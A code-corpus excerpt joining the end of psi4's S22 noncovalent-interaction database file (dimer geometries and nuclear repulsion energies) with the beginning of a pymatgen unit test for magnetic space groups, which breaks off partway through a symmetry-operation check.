H -5.7883971 0.0505530 2.0247280
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '8')] = qcdb.Molecule("""
0 1
C 0.000000 -0.000140 1.859161
H -0.888551 0.513060 1.494685
H 0.888551 0.513060 1.494685
H 0.000000 -1.026339 1.494868
H 0.000000 0.000089 2.948284
--
0 1
C 0.000000 0.000140 -1.859161
H 0.000000 -0.000089 -2.948284
H -0.888551 -0.513060 -1.494685
H 0.888551 -0.513060 -1.494685
H 0.000000 1.026339 -1.494868
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '9')] = qcdb.Molecule("""
0 1
C -0.471925 -0.471925 -1.859111
C 0.471925 0.471925 -1.859111
H -0.872422 -0.872422 -0.936125
H 0.872422 0.872422 -0.936125
H -0.870464 -0.870464 -2.783308
H 0.870464 0.870464 -2.783308
--
0 1
C -0.471925 0.471925 1.859111
C 0.471925 -0.471925 1.859111
H -0.872422 0.872422 0.936125
H 0.872422 -0.872422 0.936125
H -0.870464 0.870464 2.783308
H 0.870464 -0.870464 2.783308
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '10')] = qcdb.Molecule("""
0 1
C 1.3932178 0.0362913 -0.6332803
C 0.7280364 -1.1884015 -0.6333017
C -0.6651797 -1.2247077 -0.6332803
C -1.3932041 -0.0362972 -0.6333017
C -0.7280381 1.1884163 -0.6332803
C 0.6651677 1.2246987 -0.6333017
H 2.4742737 0.0644484 -0.6317240
H 1.2929588 -2.1105409 -0.6317401
H -1.1813229 -2.1750081 -0.6317240
H -2.4742614 -0.0644647 -0.6317401
H -1.2929508 2.1105596 -0.6317240
H 1.1813026 2.1750056 -0.6317401
--
0 1
C 0.0000000 0.0000000 3.0826195
H 0.5868776 0.8381742 3.4463772
H -1.0193189 0.0891638 3.4463772
H 0.0000000 0.0000000 1.9966697
H 0.4324413 -0.9273380 3.4463772
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '11')] = qcdb.Molecule("""
0 1
C -1.0478252 -1.4216736 0.0000000
C -1.4545034 -0.8554459 1.2062048
C -1.4545034 -0.8554459 -1.2062048
C -2.2667970 0.2771610 1.2069539
C -2.6714781 0.8450211 0.0000000
C -2.2667970 0.2771610 -1.2069539
H -1.1338534 -1.2920593 -2.1423150
H -2.5824943 0.7163066 -2.1437977
H -3.3030422 1.7232700 0.0000000
H -2.5824943 0.7163066 2.1437977
H -1.1338534 -1.2920593 2.1423150
H -0.4060253 -2.2919049 0.0000000
--
0 1
C 1.0478252 1.4216736 0.0000000
C 1.4545034 0.8554459 -1.2062048
C 1.4545034 0.8554459 1.2062048
C 2.2667970 -0.2771610 -1.2069539
C 2.6714781 -0.8450211 0.0000000
C 2.2667970 -0.2771610 1.2069539
H 0.4060253 2.2919049 0.0000000
H 1.1338534 1.2920593 2.1423150
H 2.5824943 -0.7163066 2.1437977
H 3.3030422 -1.7232700 0.0000000
H 2.5824943 -0.7163066 -2.1437977
H 1.1338534 1.2920593 -2.1423150
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '12')] = qcdb.Molecule("""
0 1
C -1.2471894 -1.1718212 -0.6961388
C -1.2471894 -1.1718212 0.6961388
N -0.2589510 -1.7235771 1.4144796
C 0.7315327 -2.2652221 0.6967288
C 0.7315327 -2.2652221 -0.6967288
N -0.2589510 -1.7235771 -1.4144796
H -2.0634363 -0.7223199 -1.2472797
H -2.0634363 -0.7223199 1.2472797
H 1.5488004 -2.7128282 1.2475604
H 1.5488004 -2.7128282 -1.2475604
--
0 1
C -0.3380031 2.0800608 1.1300452
C 0.8540254 1.3593471 1.1306308
N 1.4701787 0.9907598 0.0000000
C 0.8540254 1.3593471 -1.1306308
C -0.3380031 2.0800608 -1.1300452
N -0.9523059 2.4528836 0.0000000
H -0.8103758 2.3643033 2.0618643
H 1.3208583 1.0670610 2.0623986
H 1.3208583 1.0670610 -2.0623986
H -0.8103758 2.3643033 -2.0618643
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '13')] = qcdb.Molecule("""
0 1
N 2.0113587 -1.2132073 -0.0980673
C 2.0257076 -0.6971797 -1.3644029
H 2.2975208 -1.3910592 -2.1456459
C 1.7145226 0.5919651 -1.6124892
H 1.7272873 0.9908466 -2.6120050
C 1.3089605 1.4575340 -0.5205890
O 0.9205926 2.6110864 -0.6260457
N 1.3768885 0.8397454 0.7346356
H 1.0518040 1.3862229 1.5233710
C 1.6459909 -0.4852113 1.0187267
O 1.5611090 -0.9718061 2.1298059
H 2.1294635 -2.2015046 0.0568134
--
0 1
N -2.0113587 1.2132073 -0.0980673
C -2.0257076 0.6971797 -1.3644029
H -2.2975208 1.3910592 -2.1456459
C -1.7145226 -0.5919651 -1.6124892
H -1.7272873 -0.9908466 -2.6120050
C -1.3089605 -1.4575340 -0.5205890
O -0.9205926 -2.6110864 -0.6260457
N -1.3768885 -0.8397454 0.7346356
H -1.0518040 -1.3862229 1.5233710
C -1.6459909 0.4852113 1.0187267
O -1.5611090 0.9718061 2.1298059
H -2.1294635 2.2015046 0.0568134
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '14')] = qcdb.Molecule("""
0 1
C -0.0210742 1.5318615 -1.3639345
C -1.2746794 0.9741030 -1.6074097
C -1.3783055 -0.2256981 -2.3084154
C -0.2289426 -0.8664053 -2.7687944
C 1.0247882 -0.3035171 -2.5312410
C 1.1289996 0.8966787 -1.8299830
H 0.0600740 2.4565627 -0.8093957
H -2.1651002 1.4654521 -1.2405676
H -2.3509735 -0.6616122 -2.4926698
H -0.3103419 -1.7955762 -3.3172704
H 1.9165847 -0.7940845 -2.8993942
H 2.1000347 1.3326757 -1.6400420
--
0 1
H -2.9417647 0.8953834 2.2239054
C -2.0220674 0.4258540 1.9013549
C -0.8149418 1.0740453 2.1066982
H -0.7851529 2.0443812 2.5856086
C 0.3704286 0.4492852 1.6847458
C 1.7508619 0.8038935 1.7194004
H 2.1870108 1.6998281 2.1275903
C 2.4451359 -0.2310742 1.1353313
N 1.5646462 -1.2137812 0.7555384
C 0.2861214 -0.8269486 1.0618752
C -0.9284667 -1.4853121 0.8606937
H -0.9729200 -2.4554847 0.3834013
C -2.0792848 -0.8417668 1.2876443
H -3.0389974 -1.3203846 1.1468400
H 1.8075741 -2.0366963 0.2333038
H 3.5028794 -0.3485344 0.9695233
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '15')] = qcdb.Molecule("""
0 1
N 0.2793014 2.4068393 -0.6057517
C -1.0848570 2.4457461 -0.5511608
H -1.6594403 3.0230294 -1.2560905
N -1.5977117 1.7179877 0.4287543
C -0.4897255 1.1714358 1.0301910
C -0.3461366 0.2914710 2.1172343
N -1.4187090 -0.1677767 2.8101441
H -1.2388750 -0.9594802 3.4047578
H -2.2918734 -0.1788223 2.3073619
N 0.8857630 -0.0700763 2.4919494
C 1.9352348 0.4072878 1.7968022
H 2.9060330 0.0788414 2.1458181
N 1.9409775 1.2242019 0.7402202
C 0.6952186 1.5779858 0.4063984
H 0.8610073 2.8298045 -1.3104502
--
0 1
N 1.2754606 -0.6478993 -1.9779104
C 1.4130533 -1.5536850 -0.9550667
H 2.4258769 -1.8670780 -0.7468778
C 0.3575976 -2.0239499 -0.2530575
C 0.4821292 -3.0179494 0.8521221
H 0.1757705 -2.5756065 1.7986281
H -0.1601691 -3.8770412 0.6639498
H 1.5112443 -3.3572767 0.9513659
C -0.9684711 -1.5298112 -0.5939792
O -2.0029280 -1.8396957 -0.0199453
N -0.9956916 -0.6383870 -1.6720420
H -1.9014057 -0.2501720 -1.8985760
C 0.0684702 -0.1191762 -2.3763759
O -0.0397875 0.7227006 -3.2531083
H 2.0853289 -0.2760176 -2.4454577
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '16')] = qcdb.Molecule("""
0 1
C 0.000000 -0.667578 -2.124659
C 0.000000 0.667578 -2.124659
H 0.923621 -1.232253 -2.126185
H -0.923621 -1.232253 -2.126185
H -0.923621 1.232253 -2.126185
H 0.923621 1.232253 -2.126185
--
0 1
C 0.000000 0.000000 2.900503
C 0.000000 0.000000 1.693240
H 0.000000 0.000000 0.627352
H 0.000000 0.000000 3.963929
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '17')] = qcdb.Molecule("""
0 1
C 0.7806117 -0.6098875 -1.2075426
C 0.4784039 0.7510406 -1.2079040
C 0.3276592 1.4318573 0.0000000
C 0.4784039 0.7510406 1.2079040
C 0.7806117 -0.6098875 1.2075426
C 0.9321510 -1.2899614 0.0000000
H 0.8966688 -1.1376051 -2.1441482
H 0.3573895 1.2782091 -2.1440546
H 0.0918593 2.4871407 0.0000000
H 0.3573895 1.2782091 2.1440546
H 0.8966688 -1.1376051 2.1441482
H 1.1690064 -2.3451668 0.0000000
--
0 1
O -2.7885270 -0.2744854 0.0000000
H -2.6229114 -1.2190831 0.0000000
H -1.9015103 0.0979110 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '18')] = qcdb.Molecule("""
0 1
C -0.7392810 0.5158785 -1.2071079
C -1.4261442 0.3965455 0.0000000
C -0.7392810 0.5158785 1.2071079
C 0.6342269 0.7546398 1.2070735
C 1.3210434 0.8737566 0.0000000
C 0.6342269 0.7546398 -1.2070735
H -1.2719495 0.4206316 -2.1432894
H -2.4902205 0.2052381 0.0000000
H -1.2719495 0.4206316 2.1432894
H 1.1668005 0.8474885 2.1436950
H 2.3863585 1.0596312 0.0000000
H 1.1668005 0.8474885 -2.1436950
--
0 1
N 0.1803930 -2.9491231 0.0000000
H 0.7595495 -3.1459477 -0.8060729
H 0.7595495 -3.1459477 0.8060729
H 0.0444167 -1.9449399 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '19')] = qcdb.Molecule("""
0 1
C -0.7097741 -0.9904230 1.2077018
C -1.4065340 -0.9653529 0.0000000
C -0.7097741 -0.9904230 -1.2077018
C 0.6839651 -1.0405105 -1.2078652
C 1.3809779 -1.0655522 0.0000000
C 0.6839651 -1.0405105 1.2078652
H -1.2499482 -0.9686280 2.1440507
H -2.4869197 -0.9237060 0.0000000
H -1.2499482 -0.9686280 -2.1440507
H 1.2242882 -1.0580753 -2.1442563
H 2.4615886 -1.1029818 0.0000000
H 1.2242882 -1.0580753 2.1442563
--
0 1
N -0.0034118 3.5353926 0.0000000
C 0.0751963 2.3707040 0.0000000
H 0.1476295 1.3052847 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '20')] = qcdb.Molecule("""
0 1
C 0.0000000 0.0000000 1.0590353
C 0.0000000 -1.2060084 1.7576742
C 0.0000000 -1.2071767 3.1515905
C 0.0000000 0.0000000 3.8485751
C 0.0000000 1.2071767 3.1515905
C 0.0000000 1.2060084 1.7576742
H 0.0000000 0.0000000 -0.0215805
H 0.0000000 -2.1416387 1.2144217
H 0.0000000 -2.1435657 3.6929953
H 0.0000000 0.0000000 4.9301499
H 0.0000000 2.1435657 3.6929953
H 0.0000000 2.1416387 1.2144217
--
0 1
C -1.3940633 0.0000000 -2.4541524
C -0.6970468 1.2072378 -2.4546277
C 0.6970468 1.2072378 -2.4546277
C 1.3940633 0.0000000 -2.4541524
C 0.6970468 -1.2072378 -2.4546277
C -0.6970468 -1.2072378 -2.4546277
H -2.4753995 0.0000000 -2.4503221
H -1.2382321 2.1435655 -2.4536764
H 1.2382321 2.1435655 -2.4536764
H 2.4753995 0.0000000 -2.4503221
H 1.2382321 -2.1435655 -2.4536764
H -1.2382321 -2.1435655 -2.4536764
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '21')] = qcdb.Molecule("""
0 1
C 2.5118997 1.6250148 0.0000000
C 2.7130094 0.9578537 -1.2082918
C 3.1177821 -0.3767436 -1.2083647
C 3.3213848 -1.0437307 0.0000000
C 3.1177821 -0.3767436 1.2083647
C 2.7130094 0.9578537 1.2082918
H 2.2024038 2.6611358 0.0000000
H 2.5511760 1.4736908 -2.1445900
H 3.2702999 -0.8951406 -2.1448379
H 3.6368139 -2.0781521 0.0000000
H 3.2702999 -0.8951406 2.1448379
H 2.5511760 1.4736908 2.1445900
--
0 1
H 0.8065245 -0.4358866 0.0000000
N -0.1442408 -0.7686927 0.0000000
C -0.5161122 -2.0893220 0.0000000
C -1.8898755 -2.1814495 0.0000000
C -2.3932317 -0.8470830 0.0000000
C -1.2640653 0.0195887 0.0000000
C -1.3896004 1.4117668 0.0000000
C -2.6726501 1.9366450 0.0000000
C -3.8054511 1.0974790 0.0000000
C -3.6798167 -0.2817209 0.0000000
H 0.2310024 -2.8653173 0.0000000
H -2.4585759 -3.0956052 0.0000000
H -0.5188733 2.0539520 0.0000000
H -2.8077570 3.0097859 0.0000000
H -4.7905991 1.5439372 0.0000000
H -4.5580187 -0.9142916 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '22')] = qcdb.Molecule("""
0 1
C -2.0071056 0.7638459 -0.1083509
O -1.3885044 1.9298523 -0.4431206
H -0.5238121 1.9646519 -0.0064609
C -1.4630807 -0.1519120 0.7949930
C -2.1475789 -1.3295094 1.0883677
C -3.3743208 -1.6031427 0.4895864
C -3.9143727 -0.6838545 -0.4091028
C -3.2370496 0.4929609 -0.7096126
H -0.5106510 0.0566569 1.2642563
H -1.7151135 -2.0321452 1.7878417
H -3.9024664 -2.5173865 0.7197947
H -4.8670730 -0.8822939 -0.8811319
H -3.6431662 1.2134345 -1.4057590
--
0 1
O 1.3531168 1.9382724 0.4723133
C 2.0369747 0.7865043 0.1495491
H 1.7842846 2.3487495 1.2297110
C 1.5904026 0.0696860 -0.9574153
C 2.2417367 -1.1069765 -1.3128110
C 3.3315674 -1.5665603 -0.5748636
C 3.7696838 -0.8396901 0.5286439
C 3.1224836 0.3383498 0.8960491
H 0.7445512 0.4367983 -1.5218583
H 1.8921463 -1.6649726 -2.1701843
H 3.8330227 -2.4811537 -0.8566666
H 4.6137632 -1.1850101 1.1092635
H 3.4598854 0.9030376 1.7569489
units angstrom
""")
# <<< Derived Geometry Strings >>>
for rxn in HRXN:
GEOS['%s-%s-monoA-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1)
GEOS['%s-%s-monoB-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2)
GEOS['%s-%s-monoA-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1, 2)
GEOS['%s-%s-monoB-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2, 1)
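# Assuming the usual qcdb.Molecule.extract_fragments(reals, ghosts) convention:
# extract_fragments(1) returns monomer A in its own basis (the unCP reagent), while
# extract_fragments(1, 2) keeps fragment 1 as real atoms and turns fragment 2 into
# ghost atoms, i.e. monomer A in the full dimer basis as required for the
# counterpoise-corrected (CP) reagents, and analogously for monomer B.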
#########################################################################
# <<< Supplementary Quantum Chemical Results >>>
DATA = {}
DATA['NUCLEAR REPULSION ENERGY'] = {}
DATA['NUCLEAR REPULSION ENERGY']['S22-1-dimer'] = 40.3142398391
DATA['NUCLEAR REPULSION ENERGY']['S22-2-dimer'] = 36.6628478528
DATA['NUCLEAR REPULSION ENERGY']['S22-3-dimer'] = 235.946620315
DATA['NUCLEAR REPULSION ENERGY']['S22-4-dimer'] = 230.794855209
DATA['NUCLEAR REPULSION ENERGY']['S22-5-dimer'] = 1032.28191174
DATA['NUCLEAR REPULSION ENERGY']['S22-6-dimer'] = 812.288526081
DATA['NUCLEAR REPULSION ENERGY']['S22-7-dimer'] = 1365.23227533
DATA['NUCLEAR REPULSION ENERGY']['S22-8-dimer'] = 41.0002637953
DATA['NUCLEAR REPULSION ENERGY']['S22-9-dimer'] = 102.165309277
DATA['NUCLEAR REPULSION ENERGY']['S22-10-dimer'] = 272.461820278
DATA['NUCLEAR REPULSION ENERGY']['S22-11-dimer'] = 628.972056837
DATA['NUCLEAR REPULSION ENERGY']['S22-12-dimer'] = 654.132022225
DATA['NUCLEAR REPULSION ENERGY']['S22-13-dimer'] = 1161.47069828
DATA['NUCLEAR REPULSION ENERGY']['S22-14-dimer'] = 935.530103761
DATA['NUCLEAR REPULSION ENERGY']['S22-15-dimer'] = 1542.1430487
DATA['NUCLEAR REPULSION ENERGY']['S22-16-dimer'] = 85.1890641964
DATA['NUCLEAR REPULSION ENERGY']['S22-17-dimer'] = 273.329424698
DATA['NUCLEAR REPULSION ENERGY']['S22-18-dimer'] = 273.279614381
DATA['NUCLEAR REPULSION ENERGY']['S22-19-dimer'] = 303.281397519
DATA['NUCLEAR REPULSION ENERGY']['S22-20-dimer'] = 592.416645285
DATA['NUCLEAR REPULSION ENERGY']['S22-21-dimer'] = 876.919230124
DATA['NUCLEAR REPULSION ENERGY']['S22-22-dimer'] = 805.117733746
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoA-unCP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoB-unCP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoA-unCP'] = 9.16383014597
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoB-unCP'] = 9.1780389049
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoA-unCP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoB-unCP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoA-unCP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoB-unCP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoA-unCP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoB-unCP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoA-unCP'] = 275.701873893
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoB-unCP'] = 275.671980226
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoA-unCP'] = 503.396306786
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoB-unCP'] = 440.301569251
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoA-unCP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoB-unCP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoA-unCP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoB-unCP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoA-unCP'] = 203.707991166
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoB-unCP'] = 13.4855266506
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoA-unCP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoB-unCP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoA-unCP'] = 208.639691163
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoB-unCP'] = 208.626286711
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoA-unCP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoB-unCP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoA-unCP'] = 203.669533561
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoB-unCP'] = 401.143592213
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoA-unCP'] = 503.365644851
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoB-unCP'] = 440.147006891
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoA-unCP'] = 33.3580720823
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoB-unCP'] = 24.6979461028
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoA-unCP'] = 203.633716029
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoB-unCP'] = 9.16734256253
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoA-unCP'] = 203.672752811
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoB-unCP'] = 11.9610533611
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoA-unCP'] = 203.595134421
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoB-unCP'] = 23.6698792311
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoA-unCP'] = 203.681438992
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoB-unCP'] = 203.664080154
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoA-unCP'] = 203.56582964
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoB-unCP'] = 401.056606452
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoA-unCP'] = 271.438700576
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoB-unCP'] = 271.346177694
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoA-CP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoB-CP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoA-CP'] = 9.16383014597
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoB-CP'] = 9.1780389049
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoA-CP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoB-CP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoA-CP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoB-CP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoA-CP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoB-CP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoA-CP'] = 275.701873893
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoB-CP'] = 275.671980226
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoA-CP'] = 503.396306786
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoB-CP'] = 440.301569251
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoA-CP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoB-CP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoA-CP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoB-CP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoA-CP'] = 203.707991166
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoB-CP'] = 13.4855266506
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoA-CP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoB-CP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoA-CP'] = 208.639691163
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoB-CP'] = 208.626286711
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoA-CP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoB-CP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoA-CP'] = 203.669533561
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoB-CP'] = 401.143592213
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoA-CP'] = 503.365644851
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoB-CP'] = 440.147006891
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoA-CP'] = 33.3580720823
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoB-CP'] = 24.6979461028
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoA-CP'] = 203.633716029
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoB-CP'] = 9.16734256253
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoA-CP'] = 203.672752811
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoB-CP'] = 11.9610533611
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoA-CP'] = 203.595134421
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoB-CP'] = 23.6698792311
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoA-CP'] = 203.681438992
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoB-CP'] = 203.664080154
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoA-CP'] = 203.56582964
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoB-CP'] = 401.056606452
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoA-CP'] = 271.438700576
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoB-CP'] = 271.346177694
|
psi4/psi4
|
psi4/share/psi4/databases/S22.py
|
Python
|
lgpl-3.0
| 43,408
|
[
"Psi4"
] |
c8345a26bbe331f1d7e0a4333e869444165bfb3c462efe879578588cba4b8ab9
|
#!/usr/bin/env python
import unittest
import numpy as np
from pymatgen.core.lattice import Lattice
from pymatgen.symmetry.maggroups import MagneticSpaceGroup
from pymatgen.symmetry.groups import SpaceGroup
from pymatgen.util.testing import PymatgenTest
__author__ = "Matthew Horton"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matthew Horton"
__email__ = "mkhorton@lbl.gov"
__status__ = "Beta"
__date__ = "Feb 2017"
class MagneticSpaceGroupTest(PymatgenTest):
def setUp(self):
self.msg_1 = MagneticSpaceGroup([70, 530])
self.msg_2 = MagneticSpaceGroup([62, 448])
self.msg_3 = MagneticSpaceGroup([20, 37])
self.msg_4 = MagneticSpaceGroup([2, 7], "c,1/4a+1/4b,-1/2a+1/2b;0,0,0")
def test_init(self):
# test init with the following space group:
# 71.538 (BNS number), I_cmmm (BNS label)
# 65.10.554 (same space group as above, OG number), C_Immm (OG label)
msg_from_bns_1 = MagneticSpaceGroup("I_cmmm")
msg_from_bns_2 = MagneticSpaceGroup([71, 538])
msg_from_og_1 = MagneticSpaceGroup.from_og("C_Immm")
msg_from_og_2 = MagneticSpaceGroup.from_og([65, 10, 554])
self.assertEqual(msg_from_bns_1, msg_from_bns_2)
self.assertEqual(msg_from_og_1, msg_from_og_2)
self.assertEqual(msg_from_bns_1, msg_from_og_1)
def test_crystal_system(self):
self.assertEqual(self.msg_1.crystal_system, "orthorhombic")
self.assertEqual(self.msg_2.crystal_system, "orthorhombic")
self.assertEqual(self.msg_3.crystal_system, "orthorhombic")
def test_sg_symbol(self):
self.assertEqual(self.msg_1.sg_symbol, "Fd'd'd")
self.assertEqual(self.msg_2.sg_symbol, "Pn'ma'")
self.assertEqual(self.msg_3.sg_symbol, "C_A222_1")
def test_is_compatible(self):
cubic = Lattice.cubic(1)
hexagonal = Lattice.hexagonal(1, 2)
rhom = Lattice.rhombohedral(3, 80)
tet = Lattice.tetragonal(1, 2)
ortho = Lattice.orthorhombic(1, 2, 3)
msg = MagneticSpaceGroup("Fm-3m")
self.assertTrue(msg.is_compatible(cubic))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("Pnma")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertFalse(msg.is_compatible(rhom))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("P2/c")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertFalse(msg.is_compatible(rhom))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("P-1")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertTrue(msg.is_compatible(rhom))
self.assertTrue(msg.is_compatible(hexagonal))
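# Rationale for the assertions above (hedged): the compatibility check is expected to
# compare lattice metrics against the constraints of the group's crystal system, so a
# higher-symmetry lattice always passes for a lower-symmetry group (a cubic cell
# satisfies the orthorhombic constraints of Pnma), while P-1 (triclinic) imposes no
# metric constraints and therefore accepts every lattice, as the final block asserts.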
def test_symmetry_ops(self):
msg_1_symmops = "\n".join([str(op) for op in self.msg_1.symmetry_ops])
msg_1_symmops_ref = """x, y, z, +1
-x+3/4, -y+3/4, z, +1
-x, -y, -z, +1
x+1/4, y+1/4, -z, +1
x, -y+3/4, -z+3/4, -1
-x+3/4, y, -z+3/4, -1
-x, y+1/4, z+1/4, -1
x+1/4, -y, z+1/4, -1
x, y+1/2, z+1/2, +1
-x+3/4, -y+5/4, z+1/2, +1
-x, -y+1/2, -z+1/2, +1
x+1/4, y+3/4, -z+1/2, +1
x, -y+5/4, -z+5/4, -1
-x+3/4, y+1/2, -z+5/4, -1
-x, y+3/4, z+3/4, -1
x+1/4, -y+1/2, z+3/4, -1
x+1/2, y, z+1/2, +1
-x+5/4, -y+3/4, z+1/2, +1
-x+1/2, -y, -z+1/2, +1
x+3/4, y+1/4, -z+1/2, +1
x+1/2, -y+3/4, -z+5/4, -1
-x+5/4, y, -z+5/4, -1
-x+1/2, y+1/4, z+3/4, -1
x+3/4, -y, z+3/4, -1
x+1/2, y+1/2, z, +1
-x+5/4, -y+5/4, z, +1
-x+1/2, -y+1/2, -z, +1
x+3/4, y+3/4, -z, +1
x+1/2, -y+5/4, -z+3/4, -1
-x+5/4, y+1/2, -z+3/4, -1
-x+1/2, y+3/4, z+1/4, -1
x+3/4, -y+1/2, z+1/4, -1"""
msg_2_symmops = "\n".join([str(op) for op in self.msg_2.symmetry_ops])
msg_2_symmops_ref = """x, y, z, +1
-x, y+1/2, -z, +1
-x, -y, -z, +1
x, -y+1/2, z, +1
x+1/2, -y+1/2, -z+1/2, -1
